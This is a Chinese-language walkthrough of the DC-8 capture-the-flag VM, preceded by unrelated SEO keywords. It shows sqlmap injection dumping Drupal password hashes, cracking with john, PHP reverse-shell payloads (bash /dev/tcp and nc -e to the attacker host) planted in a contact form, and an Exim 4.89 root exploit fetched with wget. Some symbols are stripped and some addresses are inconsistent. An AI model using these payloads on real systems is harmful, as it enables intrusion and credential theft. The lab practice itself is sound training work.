咸阳做网站xymokj,平面设计培训班学费一般要多少钱,网页设计与制作实习报告,企业网站的特点一、环境搭建
kali的IP地址#xff1a;192.168.200.14
DC-8的IP地址#xff1a;192.168.200.13#xff08;一个flag#xff09;
靶机和攻击机处于同一个网络方式#xff1a;nat或桥接
若出现开机错误#xff0c;适当将dc的兼容版本改低#xff0c;我的vmware workst…一、环境搭建
kali的IP地址192.168.200.14
DC-8的IP地址192.168.200.13一个flag
靶机和攻击机处于同一个网络方式nat或桥接
若出现开机错误适当将dc的兼容版本改低我的vmware workstation是17改成16.x就可以兼容
二、信息收集
1、扫描同网段存活主机
第一种方式
arp-scan -l第二种方式
netdiscover -r 192.168.200.0/242、开放端口探测
nmap -sV -p- 192.168.200.13 开放端口有两个22SSH服务默认端口和80http默认端口
3.目录扫描 查看robots。txt文件 这些禁止爬取的文件基本上都访问不了
三漏洞探测
访问web页面 和DC-7一样的CMSDrupalDC-7的版本是8的这个DC-8的版本是7的
不过页面中存在这样的三个不同的URL:
http://192.168.200.13/?nid1
http://192.168.200.13/?nid2
http://192.168.200.13/?nid3
可能存在文件包含和SQL注入的漏洞 SQLMAP
1、扫描数据库
sqlmap -u http://192.168.200.13/?nid1 --dbs --batch2、查询数据表名
sqlmap -u http://192.168.200.13/?nid1 -D d7db --tables --batch3、查询字段名
sqlmap -u http://192.168.200.13/?nid1 -D d7db -T users --columns --batch4、查询字段值
sqlmap -u http://192.168.200.13/?nid1 -D d7db -T users -C name,pass --dump账号admin
密码 S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
账号john
密码 S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
四。漏洞利用
1.爆破密码密文
Drupal的hash密文是经过特殊加密的用john进行爆破先保存到password.txt文件中
vim password.txt爆破出来密文turtle
试试 能不能直接账号对 DC-8 进行ssh登录没成功只能想办法获取webshell了 2.反弹shell
先用获得的密码turtle登录试试登录后台应该是john的密码 登录成功 还是运用上一靶场的方法找一找能上传一句话木马的php文件
连不上。然后显示phpinfo的地址死活没反应
直接获取shell
PHP反弹 shellPost 请求发送命令?php system(bash -i /dev/tcp/192.168.200.14/8899 01);? #交互式shell?php system(bash -c sh -i /dev/tcp/192.168.200.14/8899 01);? #交互式shell?php
exec(nc -e /bin/bash 192.168.200.14 8899);
? 将提交重定向行Confirmation page确认页面给勾上然后滑下点保存联系随便填入联系表单点击发送触发PHP代码 成功反弹shell 3.提权
查一下suid权限的二进制文件
find / -perm -4000 -print 2/dev/null查询Exim 版本为4.89 利用kali搜索EXP 不破坏原有结构复制一份新的命名为shell.sh(到kali端的桌面)
cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh 开启http服务
python -m http.server 8899注交互页面方便后续操作
python -c import pty;pty.spawn(/bin/bash)在DC-7中下载该文件
wget //192.168.200.57:8888/shell.sh文件权限是无执行权限的赋予执行权限
chmod 777 shell.sh赋予可执行权限 接着根据sh脚本提示执行文件
./shell.sh不过奇怪的是执行完之后还是普通权限 查看脚本的使用规则又两个参数可用 将两个规则分别运行第一个规则在运行之后无效第二个规则成功运行等待几秒之后输入whoami可以看到提权成功 近到root目录查看最终flag内容
